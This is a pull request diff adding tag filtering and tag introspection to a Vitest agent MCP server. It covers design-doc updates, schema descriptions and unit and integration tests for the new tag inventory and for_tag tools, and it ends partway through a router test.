### PR TITLE
feat(mcp,sdk,plugin): T2 tag filtering and tag introspection

### DIFF
--- a/.claude/design/vitest-agent/components/mcp.md
+++ b/.claude/design/vitest-agent/components/mcp.md
@@ -128,6 +128,10 @@ file per tool — and broadly group into:
 - **Mutations.** `run_tests` executes `vitest run` via `spawnSync`.
   Mutates `process.env` from the `SessionContextRef` before
   `createVitest` so the in-process reporter sees current attribution.
+  Accepts a structured `tags` filter and a per-call `passWithNoTests`
+  override; emits a fourth `no-match` discriminator variant when the
+  resolved filter set matches zero tests. See *Tag filtering and tag
+  introspection* below.
 
 Both `set_current_session_id` and `get_current_session_id` are
 **removed**. The MCP server's `SessionContextRef` populates from
@@ -306,8 +310,73 @@ enumerate every project from `DataReader.getRunsByProject()` when
 `project` is unspecified, grouping output under per-project `###
 project` headers. This is required because real multi-project Vitest
 configs use names like `unit` and `integration` — there is no literal
-`"default"` project to fall back to. The `test` tool's `list` mode
-follows the same pattern.
+`"default"` project to fall back to. The `test` tool's `list` and
+`for_tag` modes follow the same pattern.
+
+## Tag filtering and tag introspection (T2)
+
+Vitest 4.1 native tags are the way agents target test subsets in 2.0
+(`unit`, `int`, `e2e`, `slow`, etc.). The plugin's tag-injection
+pipeline already populates the `tags` / `test_case_tags` /
+`test_suite_tags` tables; T2 surfaces that data on three MCP tools
+without adding a new top-level tool. The tool count stays at 29.
+
+**`run_tests` tag filter.** A new optional `tags` input carries a
+`TagFilter` struct with three optional arrays: `all` (every listed tag
+must be on the test), `any` (at least one), `none` (excludes any test
+carrying a listed tag). The three sub-filters AND together with each
+other and with `project` / `files` — strict AND across filters, no
+silent override. The `none` axis covers all negation (no separate
+`not_any` / `not_all`). The pure `composeTagExpression` helper in
+`packages/mcp/src/tools/run-tests.ts` flattens a `TagFilter` to
+Vitest's `tagsFilter` expression: `"int and slow"` for `all`,
+`"(unit or int)"` for `any` with 2+ entries, `"not slow and not flaky"`
+for `none`, three joined by ` and `. Returns `null` when every
+sub-filter is empty. `sanitizeTestArgs` covers tag values with the
+same `FORBIDDEN_CHARS` regex it applies to `files` and `project`.
+
+**`run_tests` `passWithNoTests` per-call override.** The tool input
+accepts an optional `passWithNoTests` boolean that wins for that
+invocation only over the project-level default the plugin captured
+from Vitest's native `test.passWithNoTests` at `configureVitest` time
+and forwarded onto `ResolvedReporterConfig`. No new
+`AgentPluginOptions` field — users still configure it the normal
+Vitest way. Controls pass/fail classification and CLI exit-code
+semantics only; it does not reshape the MCP response shape.
+
+**`run_tests` `no-match` discriminator.** `RunTestsNoMatch` joins
+`ok | timeout | error` in `RunTestsResult` as the fourth variant on
+the `kind` discriminator. Detection fires after `vitest.start` when
+`testModules.length === 0` AND `unhandledErrors.length === 0` AND the
+call carried any filter (`files`, `project`, or `tags`) — filter-driven,
+not result-driven. A truly empty workspace with no filter still emits
+`ok` with an empty report. The variant carries
+`filter: { project, files, tags, resolvedExpression }` — the resolved
+context echoes back verbatim plus the composed `tagsFilter` string for
+transparency. `passWithNoTests` policy never reshapes the discriminator;
+even with `passWithNoTests: true` a filtered empty selection still emits
+`no-match`. `formatRunTestsMarkdown` dispatches to `formatNoMatchMarkdown`
+on this branch, echoing the resolved filter and printing
+tag-introspection / `for_file` / `project` remediation pointers.
+
+**`inventory({ kind: "tag" })`.** New input variant with an optional
+`project` scope. The output union gains two distinct
+`inventoryKind` literals to encode the asymmetric scoped vs unscoped
+shapes — the input discriminator (`kind: "tag"`) does not match 1:1
+with the output shape, mirroring the existing `session_detail` /
+`session_list` precedent. `tag_scoped` (when `project` is supplied)
+omits the per-project breakdown; `tag_unscoped` (when `project` is
+omitted) carries a `byProject` array inline on every tag row with
+per-project module + test counts. The MCP handler reads the SDK
+reader's flat `(tag, project)` rows from `listTagInventory` and pivots
+them by tag, aggregating module + test counts across projects in
+alphabetical order.
+
+**`test({ action: "for_tag" })`.** New input variant that mirrors
+`action: "for_file"`. Takes a `tag` plus optional `project`; returns
+`TestRowSchema` rows grouped by project (one group per project carrying
+the tag, or a single group when `project` is supplied). Delegates to
+`DataReader.listTestsForTag`.
 
 ## MCP boot context recovery
 

--- a/.claude/design/vitest-agent/schemas.md
+++ b/.claude/design/vitest-agent/schemas.md
@@ -413,6 +413,15 @@ The notable ones:
 - **`FindIdempotentResponse`** — `(procedurePath, key) =>
   Effect<Option<string>, DataStoreError>`. Returns `Option.none()` when no
   cached response exists; otherwise the stored `result_json`.
+- **`TagInventoryRow`** — `{ tag, project, moduleCount, testCount }`.
+  `listTagInventory(options?)` returns one row per `(tag, project)` pair
+  read from each project's latest run, optionally filtered to a single
+  project. `listTestsForTag(tag, options?)` returns `TestListEntry` rows
+  from each project's latest run carrying the tag. Both read from the
+  existing `tags` / `test_case_tags` / `test_suite_tags` tables. The
+  MCP `inventory({ kind: "tag" })` handler pivots the flat
+  `(tag, project)` rows into the asymmetric scoped vs unscoped output
+  shape (see *MCP tool schemas* below).
 
 ## Reporter failure-processing output
 
@@ -422,6 +431,60 @@ function that walks Vitest stack frames, source-maps the top non-framework
 frame, runs `findFunctionBoundary` on the resolved source, and calls
 `computeFailureSignature` with the parsed pieces. The result feeds
 `DataStore.writeFailureSignature` and the per-frame `stack_frames` rows.
+
+## MCP tag-filtering schemas (T2)
+
+The MCP `run_tests`, `inventory`, and `test` tools gained three input
+variants and three output variants in T2 to surface Vitest 4.1 native
+tags through the agent-facing tool surface. The schemas live alongside
+the existing tool input/output unions in their respective tool files.
+
+**`TagFilter`** (input on `run_tests`) — Effect Struct with three
+optional string arrays: `all`, `any`, `none`. All three sub-filters
+AND together with each other and with `project` / `files`. Definition:
+`packages/mcp/src/tools/run-tests.ts`.
+
+**`RunTestsNoMatch`** (output on `run_tests`) — fourth variant on
+`RunTestsResult` joining `ok | timeout | error`. Discriminator stays
+`kind`. Carries `filter: { project: string | null, files: string[],
+tags: TagFilter | null, resolvedExpression: string | null }` so the
+agent sees the resolved filter context plus the composed
+`--tags-filter` string the server passed to Vitest. Emitted when
+post-`vitest.start` `testModules.length === 0` AND
+`unhandledErrors.length === 0` AND any filter was supplied. Filter-driven,
+not result-driven; `passWithNoTests` policy never reshapes the
+discriminator. Definition: `packages/mcp/src/tools/run-tests.ts`.
+
+**`TagVariant`** (input on `inventory`) — `{ kind: "tag", project?:
+string }`. New member of the `InventoryInput` union. Definition:
+`packages/mcp/src/tools/inventory.ts`.
+
+**`TagInventoryScoped` / `TagInventoryUnscoped`** (output on
+`inventory`) — two distinct `inventoryKind` literals (`"tag_scoped"`
+when `project` is supplied, `"tag_unscoped"` when omitted) follow the
+existing `session_detail` / `session_list` precedent where the input
+discriminator does not match 1:1 with the output shape.
+`TagInventoryScoped` carries `{ project, count, tags: TagRowScoped[] }`;
+`TagInventoryUnscoped` carries `{ count, tags: TagRowUnscoped[] }`.
+
+**`TagRowScoped`** — `{ tag, moduleCount, testCount }`. The
+scoped row omits the per-project breakdown.
+
+**`TagRowUnscoped`** — `{ tag, moduleCount, testCount, byProject:
+TagProjectBreakdown[] }`. The unscoped row carries the per-project
+breakdown inline on every tag, with aggregated `moduleCount` /
+`testCount` summed across projects.
+
+**`TagProjectBreakdown`** — `{ project, moduleCount, testCount }`.
+Carried by `TagRowUnscoped.byProject` only.
+
+**`TestForTagResult`** (output on `test`) — `{ action: "for_tag", tag,
+count, groups: TestListGroup[] }`. New member of the test output
+union. Reuses the existing per-project `{ project, tests[] }` group
+shape and the same `TestRowSchema` rows as `action: "list"`. When
+input `project` is omitted, every project carrying the tag emits a
+group; when supplied, returns a single group. Definition:
+`packages/mcp/src/tools/test.ts`.
 
 ## SQLite table inventory
 

--- a/packages/mcp/CLAUDE.md
+++ b/packages/mcp/CLAUDE.md
@@ -263,8 +263,8 @@ single action-keyed tools that dispatch via
 | ---- | -------- |
 | `hypothesis` | `record`, `validate`, `list` |
 | `note` | `create`, `list`, `get`, `update`, `delete`, `search` |
-| `inventory` | `kind: project`, `kind: module`, `kind: suite`, `kind: session` (with optional `id` for single-row lookup) |
-| `test` | `list`, `get`, `for_file` |
+| `inventory` | `kind: project`, `kind: module`, `kind: suite`, `kind: session` (with optional `id` for single-row lookup), `kind: tag` (T2; per-tag module/test counts — scoped form omits the per-project breakdown, unscoped form carries a `byProject` inline on every row) |
+| `test` | `list`, `get`, `for_file`, `for_tag` (T2; mirrors `for_file`, groups by project) |
 | `tdd_task` | `start`, `end`, `get`, `resume` (replaces `tdd_session_*`; the underlying SQLite columns retain the `tdd_tasks` naming) |
 | `tdd_goal` | `create`, `update`, `delete`, `get`, `list` |
 | `tdd_behavior` | `create`, `update`, `delete`, `get`, `list_by_goal`, `list_by_tdd_task` |
@@ -293,3 +293,33 @@ attributes the run to the active agent.
 procedure paths: `hypothesis` (record/validate), `tdd_task`
 (start/end), `tdd_goal` (create), `tdd_behavior` (create). Key
 derivation considers the `action` discriminator first.
+
+## T2: tag filtering and tag introspection
+
+The `run_tests` tool's input gained a structured `tags` filter
+(`{ all?, any?, none? }`) and a per-call `passWithNoTests` override.
+The three sub-filters AND together with each other and with `project` /
+`files`; `none` covers all negation. The pure `composeTagExpression`
+helper flattens a `TagFilter` to Vitest's native tag expression
+(`"int and slow"` for `all`, `"(unit or int)"` for `any` with 2+
+entries, `"not slow and not flaky"` for `none`, three joined by
+` and `). Returns `null` when every sub-filter is empty.
+
+`RunTestsResult` gained a fourth `kind: "no-match"` discriminator
+variant. The MCP server emits `no-match` (rather than `ok` with an
+empty report) after `vitest.start` when `testModules.length === 0`
+AND `unhandledErrors.length === 0` AND any filter (`files`,
+`project`, or `tags`) was supplied. Detection is filter-driven, not
+result-driven; `passWithNoTests` policy never reshapes the
+discriminator. The variant carries the resolved filter context
+(`project`, `files`, `tags`, plus the composed `resolvedExpression`
+string) verbatim so the agent can decide whether to broaden the
+filter or treat the empty set as a finding. `sanitizeTestArgs`
+covers tag values with the same `FORBIDDEN_CHARS` regex it applies
+to `files` and `project`.
+
+No new `AgentPluginOptions` field for `passWithNoTests`. The plugin
+reads Vitest's native `test.passWithNoTests` from the resolved
+config at `configureVitest` time and threads it onto
+`ResolvedReporterConfig.passWithNoTests`. The `run_tests` per-call
+override wins for that invocation only.

--- a/packages/mcp/__test__/integration/run-tests-tag-filter.int.test.ts
+++ b/packages/mcp/__test__/integration/run-tests-tag-filter.int.test.ts
@@ -1,0 +1,236 @@
+/**
+ * Integration tests for the T2 tag-filtering MCP surface.
+ *
+ * Seeds a multi-tag fixture into the persistence layer, then walks the
+ * three new tool surfaces end-to-end via the tRPC caller:
+ *   inventory({ kind: "tag" })        — scoped + unscoped pivots
+ *   test({ action: "for_tag" })       — per-project grouping
+ *
+ * The run_tests tag filter and no-match discriminator are exercised by
+ * unit tests under packages/mcp/__test__/run-tests.test.ts (the schema
+ * round trip and composer cover the wire-level contract; the actual
+ * Vitest spawn is verified by manual smoke run).
+ */
+import { Effect } from "effect";
+import { describe, expect } from "vitest";
+import { DataStore } from "vitest-agent-sdk";
+import type { McpContext } from "../../src/context.js";
+import { createCallerFactory, createCurrentSessionIdRef, createSessionContextRef } from "../../src/context.js";
+import { appRouter } from "../../src/router.js";
+import type { InventoryResultType } from "../../src/tools/inventory.js";
+import type { TestResultType } from "../../src/tools/test.js";
+import { test as base } from "./utils/fixtures.js";
+
+const settingsInput = {
+	vitestVersion: "3.2.0",
+	pool: "forks",
+	environment: "node",
+	testTimeout: 5000,
+	hookTimeout: 10000,
+	slowTestThreshold: 300,
+	maxConcurrency: 5,
+	maxWorkers: 4,
+	isolate: true,
+	bail: 0,
+	globals: false,
+	fileParallelism: true,
+	sequenceSeed: 42,
+	coverageProvider: "v8",
+};
+
+/**
+ * Seed three test files with overlapping tag combinations into two
+ * projects. Designed to make AND/OR/NOT semantics visible:
+ *
+ *   proj-x:
+ *     fixture-a.test.ts (unit only)
+ *     fixture-b.test.ts (int + slow)
+ *     fixture-c.test.ts (e2e + int)
+ *   proj-y:
+ *     fixture-d.test.ts (int)        — same tag as proj-x but different project
+ *
+ * Seeded once per file via the `seeded` fixture below; the listTagInventory
+ * reader filters to the latest run per project, so re-seeding within the
+ * file would multiply the latest-run rows and double-count tags.
+ */
+const test = base.extend<{ seeded: true }>({
+	seeded: [
+		async ({ runtime }, use) => {
+			await runtime.runPromise(
+				Effect.gen(function* () {
+					const store = yield* DataStore;
+					yield* store.writeSettings("int-tag-fixture", settingsInput, {});
+
+					const runX = yield* store.writeRun({
+						invocationId: "int-tag-x",
+						project: "proj-x",
+						settingsHash: "int-tag-fixture",
+						timestamp: "2026-05-01T00:00:00.000Z",
+						commitSha: "abc",
+						branch: "main",
+						reason: "passed" as const,
+						duration: 100,
+						total: 3,
+						passed: 3,
+						failed: 0,
+						skipped: 0,
+						scoped: false,
+					});
+					const fa = yield* store.ensureFile("fixture-a.test.ts");
+					const fb = yield* store.ensureFile("fixture-b.test.ts");
+					const fc = yield* store.ensureFile("fixture-c.test.ts");
+					const [modA, modB, modC] = yield* store.writeModules(runX, [
+						{ fileId: fa, relativeModuleId: "fixture-a.test.ts", state: "passed", duration: 10 },
+						{ fileId: fb, relativeModuleId: "fixture-b.test.ts", state: "passed", duration: 10 },
+						{ fileId: fc, relativeModuleId: "fixture-c.test.ts", state: "passed", duration: 10 },
+					]);
+					yield* store.writeTestCases(modA, [
+						{ name: "unit a", fullName: "fixture-a > unit a", state: "passed", tags: ["unit"] },
+					]);
+					yield* store.writeTestCases(modB, [
+						{ name: "int slow b", fullName: "fixture-b > int slow b", state: "passed", tags: ["int", "slow"] },
+					]);
+					yield* store.writeTestCases(modC, [
+						{ name: "e2e int c", fullName: "fixture-c > e2e int c", state: "passed", tags: ["e2e", "int"] },
+					]);
+
+					const runY = yield* store.writeRun({
+						invocationId: "int-tag-y",
+						project: "proj-y",
+						settingsHash: "int-tag-fixture",
+						timestamp: "2026-05-01T00:00:00.000Z",
+						commitSha: "abc",
+						branch: "main",
+						reason: "passed" as const,
+						duration: 50,
+						total: 1,
+						passed: 1,
+						failed: 0,
+						skipped: 0,
+						scoped: false,
+					});
+					const fd = yield* store.ensureFile("fixture-d.test.ts");
+					const [modD] = yield* store.writeModules(runY, [
+						{ fileId: fd, relativeModuleId: "fixture-d.test.ts", state: "passed", duration: 5 },
+					]);
+					yield* store.writeTestCases(modD, [
+						{ name: "int d", fullName: "fixture-d > int d", state: "passed", tags: ["int"] },
+					]);
+				}),
+			);
+			await use(true);
+		},
+		{ scope: "file" },
+	],
+});
+
+const makeCaller = (runtime: unknown) =>
+	createCallerFactory(appRouter)({
+		runtime: runtime as McpContext["runtime"],
+		cwd: process.cwd(),
+		currentSessionId: createCurrentSessionIdRef(null),
+		sessionContext: createSessionContextRef(),
+	});
+
+describe("T2 tag-filtering MCP surface — integration", () => {
+	test("inventory({ kind: 'tag' }) unscoped pivots flat reader rows into a per-tag breakdown", async ({
+		runtime,
+		seeded: _seeded,
+	}) => {
+		const caller = makeCaller(runtime);
+		const result = (await caller.inventory({ kind: "tag" })) as InventoryResultType;
+		expect(result.inventoryKind).toBe("tag_unscoped");
+		if (result.inventoryKind !== "tag_unscoped") return;
+
+		// Four distinct tags across the fixture: int, slow, e2e, unit
+		const tags = result.tags.map((t) => t.tag).sort();
+		expect(tags).toEqual(["e2e", "int", "slow", "unit"]);
+
+		const intRow = result.tags.find((t) => t.tag === "int");
+		// int spans proj-x (two modules: fixture-b + fixture-c) and proj-y (one module).
+		expect(intRow?.testCount).toBe(3);
+		expect(intRow?.moduleCount).toBe(3);
+		expect(intRow?.byProject.length).toBe(2);
+		expect(intRow?.byProject.find((b) => b.project === "proj-x")?.testCount).toBe(2);
+		expect(intRow?.byProject.find((b) => b.project === "proj-y")?.testCount).toBe(1);
+
+		const slowRow = result.tags.find((t) => t.tag === "slow");
+		// slow only appears on fixture-b.
+		expect(slowRow?.testCount).toBe(1);
+		expect(slowRow?.byProject.length).toBe(1);
+		expect(slowRow?.byProject[0].project).toBe("proj-x");
+	});
+
+	test("inventory({ kind: 'tag', project }) scopes the inventory to a single project", async ({
+		runtime,
+		seeded: _seeded,
+	}) => {
+		const caller = makeCaller(runtime);
+		const result = (await caller.inventory({ kind: "tag", project: "proj-y" })) as InventoryResultType;
+		expect(result.inventoryKind).toBe("tag_scoped");
+		if (result.inventoryKind !== "tag_scoped") return;
+		expect(result.project).toBe("proj-y");
+		// proj-y only carries the int tag.
+		expect(result.count).toBe(1);
+		expect(result.tags[0].tag).toBe("int");
+		expect(result.tags[0].testCount).toBe(1);
+	});
+
+	test("test({ action: 'for_tag' }) unscoped groups int-tagged tests across both projects", async ({
+		runtime,
+		seeded: _seeded,
+	}) => {
+		const caller = makeCaller(runtime);
+		const result = (await caller.test({ action: "for_tag", tag: "int" })) as TestResultType;
+		expect(result.action).toBe("for_tag");
+		if (result.action !== "for_tag") return;
+		expect(result.count).toBe(3);
+		expect(result.groups.length).toBe(2);
+		const xGroup = result.groups.find((g) => g.project === "proj-x");
+		expect(xGroup?.tests.map((t) => t.fullName).sort()).toEqual(["fixture-b > int slow b", "fixture-c > e2e int c"]);
+		const yGroup = result.groups.find((g) => g.project === "proj-y");
+		expect(yGroup?.tests[0].fullName).toBe("fixture-d > int d");
+	});
+
+	test("test({ action: 'for_tag', project }) scopes to a single project group", async ({
+		runtime,
+		seeded: _seeded,
+	}) => {
+		const caller = makeCaller(runtime);
+		const result = (await caller.test({ action: "for_tag", tag: "e2e", project: "proj-x" })) as TestResultType;
+		expect(result.action).toBe("for_tag");
+		if (result.action !== "for_tag") return;
+		expect(result.count).toBe(1);
+		expect(result.groups.length).toBe(1);
+		expect(result.groups[0].project).toBe("proj-x");
+		expect(result.groups[0].tests[0].fullName).toBe("fixture-c > e2e int c");
+	});
+
+	test("inventory and for_tag are consistent — the per-tag count matches the for_tag result count", async ({
+		runtime,
+		seeded: _seeded,
+	}) => {
+		const caller = makeCaller(runtime);
+		const inv = (await caller.inventory({ kind: "tag" })) as InventoryResultType;
+		if (inv.inventoryKind !== "tag_unscoped") throw new Error("expected tag_unscoped");
+		for (const tagRow of inv.tags) {
+			const list = (await caller.test({ action: "for_tag", tag: tagRow.tag })) as TestResultType;
+			if (list.action !== "for_tag") throw new Error("expected for_tag");
+			expect(list.count).toBe(tagRow.testCount);
+			// And the projects-per-tag match too
+			expect(list.groups.map((g) => g.project).sort()).toEqual(tagRow.byProject.map((b) => b.project).sort());
+		}
+	});
+
+	test("for_tag against an unknown tag returns count 0 and an empty groups array", async ({
+		runtime,
+		seeded: _seeded,
+	}) => {
+		const caller = makeCaller(runtime);
+		const result = (await caller.test({ action: "for_tag", tag: "nonexistent" })) as TestResultType;
+		expect(result.action).toBe("for_tag");
+		if (result.action !== "for_tag") return;
+		expect(result.count).toBe(0);
+		expect(result.groups).toEqual([]);
+	});
+});

--- a/packages/mcp/__test__/inventory-tag.test.ts
+++ b/packages/mcp/__test__/inventory-tag.test.ts
@@ -9,7 +9,7 @@
  * and that the structured payload round-trips the InventoryResult schema.
  */
 import { Effect, Layer, ManagedRuntime, Schema } from "effect";
-import { afterAll, describe, expect, it } from "vitest";
+import { afterAll, beforeAll, describe, expect, it } from "vitest";
 import { DataStore, OutputPipelineLive, ProjectDiscoveryTest } from "vitest-agent-sdk";
 import type { McpContext } from "../src/context.js";
 import { createCallerFactory, createCurrentSessionIdRef, createSessionContextRef } from "../src/context.js";
@@ -111,9 +111,16 @@ const seedTwoProjectFixture = async () => {
 	);
 };
 
+// Seed once at file scope. Re-seeding within tests with the same timestamps
+// would cause the latest-run-per-project filter to find duplicates; seeding
+// once via beforeAll keeps each test independent of ordering without the
+// timestamp dance.
+beforeAll(async () => {
+	await seedTwoProjectFixture();
+});
+
 describe("inventory({ kind: 'tag' }) — scoped", () => {
 	it("returns inventoryKind 'tag_scoped' with the project name and per-tag rows", async () => {
-		await seedTwoProjectFixture();
 		const caller = makeCaller();
 		const result = (await caller.inventory({ kind: "tag", project: "proj-a" })) as InventoryResultType;
 		expect(result.inventoryKind).toBe("tag_scoped");
@@ -142,9 +149,6 @@ describe("inventory({ kind: 'tag' }) — scoped", () => {
 
 describe("inventory({ kind: 'tag' }) — unscoped", () => {
 	it("returns inventoryKind 'tag_unscoped' and carries a byProject breakdown per tag", async () => {
-		// The seed from the previous suite remains because ManagedRuntime persists
-		// across tests in this module. Re-seeding is idempotent for our assertions
-		// — the latest run per project is what listTagInventory reads.
 		const caller = makeCaller();
 		const result = (await caller.inventory({ kind: "tag" })) as InventoryResultType;
 		expect(result.inventoryKind).toBe("tag_unscoped");

--- a/packages/mcp/__test__/inventory-tag.test.ts
+++ b/packages/mcp/__test__/inventory-tag.test.ts
@@ -1,0 +1,256 @@
+/**
+ * Unit tests for inventory({ kind: "tag" }) MCP tool.
+ *
+ * Covers the asymmetric output shape:
+ *   - scoped (project supplied)   → inventoryKind: "tag_scoped"
+ *   - unscoped (no project)       → inventoryKind: "tag_unscoped" with byProject breakdown
+ *
+ * Plus the markdown formatter for both shapes, the empty-database fallback,
+ * and that the structured payload round-trips the InventoryResult schema.
+ */
+import { Effect, Layer, ManagedRuntime, Schema } from "effect";
+import { afterAll, describe, expect, it } from "vitest";
+import { DataStore, OutputPipelineLive, ProjectDiscoveryTest } from "vitest-agent-sdk";
+import type { McpContext } from "../src/context.js";
+import { createCallerFactory, createCurrentSessionIdRef, createSessionContextRef } from "../src/context.js";
+import { appRouter } from "../src/router.js";
+import type { InventoryResultType } from "../src/tools/inventory.js";
+import { InventoryResult, formatInventoryMarkdown } from "../src/tools/inventory.js";
+import { DataStoreTestLayer } from "./utils/layers.js";
+
+const TestLayer = Layer.mergeAll(DataStoreTestLayer, OutputPipelineLive, ProjectDiscoveryTest.layer([]));
+const testRuntime = ManagedRuntime.make(TestLayer);
+
+const makeCaller = () => {
+	const factory = createCallerFactory(appRouter);
+	return factory({
+		runtime: testRuntime as unknown as McpContext["runtime"],
+		cwd: process.cwd(),
+		currentSessionId: createCurrentSessionIdRef(),
+		sessionContext: createSessionContextRef(),
+	});
+};
+
+afterAll(async () => {
+	await testRuntime.dispose();
+});
+
+const settingsInput = {
+	vitestVersion: "3.2.0",
+	pool: "forks",
+	environment: "node",
+	testTimeout: 5000,
+	hookTimeout: 10000,
+	slowTestThreshold: 300,
+	maxConcurrency: 5,
+	maxWorkers: 4,
+	isolate: true,
+	bail: 0,
+	globals: false,
+	fileParallelism: true,
+	sequenceSeed: 42,
+	coverageProvider: "v8",
+};
+
+const seedTwoProjectFixture = async () => {
+	await testRuntime.runPromise(
+		Effect.gen(function* () {
+			const store = yield* DataStore;
+			yield* store.writeSettings("inv-tag-hash", settingsInput, {});
+
+			// proj-a: two int-tagged tests in one module + one e2e-tagged test in another module
+			const runA = yield* store.writeRun({
+				invocationId: "inv-tag-a",
+				project: "proj-a",
+				settingsHash: "inv-tag-hash",
+				timestamp: "2026-05-01T00:00:00.000Z",
+				commitSha: "abc",
+				branch: "main",
+				reason: "passed" as const,
+				duration: 100,
+				total: 3,
+				passed: 3,
+				failed: 0,
+				skipped: 0,
+				scoped: false,
+			});
+			const fileA1 = yield* store.ensureFile("src/a-int.test.ts");
+			const fileA2 = yield* store.ensureFile("src/a-e2e.test.ts");
+			const [modA1, modA2] = yield* store.writeModules(runA, [
+				{ fileId: fileA1, relativeModuleId: "src/a-int.test.ts", state: "passed", duration: 50 },
+				{ fileId: fileA2, relativeModuleId: "src/a-e2e.test.ts", state: "passed", duration: 50 },
+			]);
+			yield* store.writeTestCases(modA1, [
+				{ name: "int 1", fullName: "a > int 1", state: "passed", tags: ["int"] },
+				{ name: "int 2", fullName: "a > int 2", state: "passed", tags: ["int"] },
+			]);
+			yield* store.writeTestCases(modA2, [{ name: "e2e 1", fullName: "a > e2e 1", state: "passed", tags: ["e2e"] }]);
+
+			// proj-b: one int-tagged test
+			const runB = yield* store.writeRun({
+				invocationId: "inv-tag-b",
+				project: "proj-b",
+				settingsHash: "inv-tag-hash",
+				timestamp: "2026-05-01T00:00:00.000Z",
+				commitSha: "abc",
+				branch: "main",
+				reason: "passed" as const,
+				duration: 80,
+				total: 1,
+				passed: 1,
+				failed: 0,
+				skipped: 0,
+				scoped: false,
+			});
+			const fileB = yield* store.ensureFile("src/b-int.test.ts");
+			const [modB] = yield* store.writeModules(runB, [
+				{ fileId: fileB, relativeModuleId: "src/b-int.test.ts", state: "passed", duration: 30 },
+			]);
+			yield* store.writeTestCases(modB, [{ name: "int b", fullName: "b > int b", state: "passed", tags: ["int"] }]);
+		}),
+	);
+};
+
+describe("inventory({ kind: 'tag' }) — scoped", () => {
+	it("returns inventoryKind 'tag_scoped' with the project name and per-tag rows", async () => {
+		await seedTwoProjectFixture();
+		const caller = makeCaller();
+		const result = (await caller.inventory({ kind: "tag", project: "proj-a" })) as InventoryResultType;
+		expect(result.inventoryKind).toBe("tag_scoped");
+		if (result.inventoryKind !== "tag_scoped") return;
+		expect(result.project).toBe("proj-a");
+		expect(result.count).toBe(2); // int, e2e
+		const intRow = result.tags.find((t) => t.tag === "int");
+		expect(intRow?.moduleCount).toBe(1);
+		expect(intRow?.testCount).toBe(2);
+		const e2eRow = result.tags.find((t) => t.tag === "e2e");
+		expect(e2eRow?.moduleCount).toBe(1);
+		expect(e2eRow?.testCount).toBe(1);
+	});
+
+	it("returns an empty tag list for a project with no tagged tests", async () => {
+		// Use a project name that does not appear in the seeded fixture.
+		const caller = makeCaller();
+		const result = (await caller.inventory({ kind: "tag", project: "proj-nonexistent" })) as InventoryResultType;
+		expect(result.inventoryKind).toBe("tag_scoped");
+		if (result.inventoryKind !== "tag_scoped") return;
+		expect(result.project).toBe("proj-nonexistent");
+		expect(result.count).toBe(0);
+		expect(result.tags).toEqual([]);
+	});
+});
+
+describe("inventory({ kind: 'tag' }) — unscoped", () => {
+	it("returns inventoryKind 'tag_unscoped' and carries a byProject breakdown per tag", async () => {
+		// The seed from the previous suite remains because ManagedRuntime persists
+		// across tests in this module. Re-seeding is idempotent for our assertions
+		// — the latest run per project is what listTagInventory reads.
+		const caller = makeCaller();
+		const result = (await caller.inventory({ kind: "tag" })) as InventoryResultType;
+		expect(result.inventoryKind).toBe("tag_unscoped");
+		if (result.inventoryKind !== "tag_unscoped") return;
+		expect(result.count).toBeGreaterThanOrEqual(2);
+
+		const intRow = result.tags.find((t) => t.tag === "int");
+		expect(intRow).toBeDefined();
+		// int appears in proj-a (2 tests) and proj-b (1 test).
+		expect(intRow?.testCount).toBe(3);
+		expect(intRow?.moduleCount).toBe(2);
+		expect(intRow?.byProject.find((b) => b.project === "proj-a")?.testCount).toBe(2);
+		expect(intRow?.byProject.find((b) => b.project === "proj-b")?.testCount).toBe(1);
+
+		const e2eRow = result.tags.find((t) => t.tag === "e2e");
+		expect(e2eRow).toBeDefined();
+		expect(e2eRow?.byProject.length).toBe(1);
+		expect(e2eRow?.byProject[0].project).toBe("proj-a");
+	});
+});
+
+describe("formatInventoryMarkdown — tag variants", () => {
+	it("renders the scoped table with Modules / Tests columns", () => {
+		const md = formatInventoryMarkdown({
+			inventoryKind: "tag_scoped",
+			project: "proj-x",
+			count: 2,
+			tags: [
+				{ tag: "int", moduleCount: 2, testCount: 5 },
+				{ tag: "e2e", moduleCount: 1, testCount: 2 },
+			],
+		});
+		expect(md).toContain("## Tags — proj-x");
+		expect(md).toContain("| Tag | Modules | Tests |");
+		expect(md).toContain("| int | 2 | 5 |");
+		expect(md).toContain("| e2e | 1 | 2 |");
+	});
+
+	it("renders the unscoped table including the Projects breakdown", () => {
+		const md = formatInventoryMarkdown({
+			inventoryKind: "tag_unscoped",
+			count: 1,
+			tags: [
+				{
+					tag: "int",
+					moduleCount: 2,
+					testCount: 3,
+					byProject: [
+						{ project: "proj-a", moduleCount: 1, testCount: 2 },
+						{ project: "proj-b", moduleCount: 1, testCount: 1 },
+					],
+				},
+			],
+		});
+		expect(md).toContain("## Tags");
+		expect(md).toContain("| Tag | Modules | Tests | Projects |");
+		expect(md).toContain("proj-a (2)");
+		expect(md).toContain("proj-b (1)");
+	});
+
+	it("falls back to the empty message when count is zero", () => {
+		const mdScoped = formatInventoryMarkdown({
+			inventoryKind: "tag_scoped",
+			project: "proj-empty",
+			count: 0,
+			tags: [],
+		});
+		expect(mdScoped).toContain("No tags recorded for project `proj-empty`");
+
+		const mdUnscoped = formatInventoryMarkdown({
+			inventoryKind: "tag_unscoped",
+			count: 0,
+			tags: [],
+		});
+		expect(mdUnscoped).toContain("No tags recorded");
+	});
+});
+
+describe("InventoryResult schema accepts the new tag variants", () => {
+	it("round-trips tag_scoped through encode + decode", () => {
+		const payload: InventoryResultType = {
+			inventoryKind: "tag_scoped",
+			project: "proj-x",
+			count: 1,
+			tags: [{ tag: "int", moduleCount: 1, testCount: 2 }],
+		};
+		const encoded = Schema.encodeUnknownSync(InventoryResult)(payload);
+		const decoded = Schema.decodeUnknownSync(InventoryResult)(encoded);
+		expect(decoded.inventoryKind).toBe("tag_scoped");
+	});
+
+	it("round-trips tag_unscoped through encode + decode", () => {
+		const payload: InventoryResultType = {
+			inventoryKind: "tag_unscoped",
+			count: 1,
+			tags: [
+				{
+					tag: "int",
+					moduleCount: 2,
+					testCount: 3,
+					byProject: [{ project: "proj-a", moduleCount: 1, testCount: 2 }],
+				},
+			],
+		};
+		const encoded = Schema.encodeUnknownSync(InventoryResult)(payload);
+		const decoded = Schema.decodeUnknownSync(InventoryResult)(encoded);
+		expect(decoded.inventoryKind).toBe("tag_unscoped");
+	});
+});

--- a/packages/mcp/__test__/router.test.ts
+++ b/packages/mcp/__test__/router.test.ts
@@ -126,6 +126,20 @@ describe("MCP Router", () => {
 		expect(result.helpText).toContain("Parameter Key");
 	});
 
+	it("help describes the T2 tag-filtering and tag-introspection surface", async () => {
+		const caller = createTestCaller();
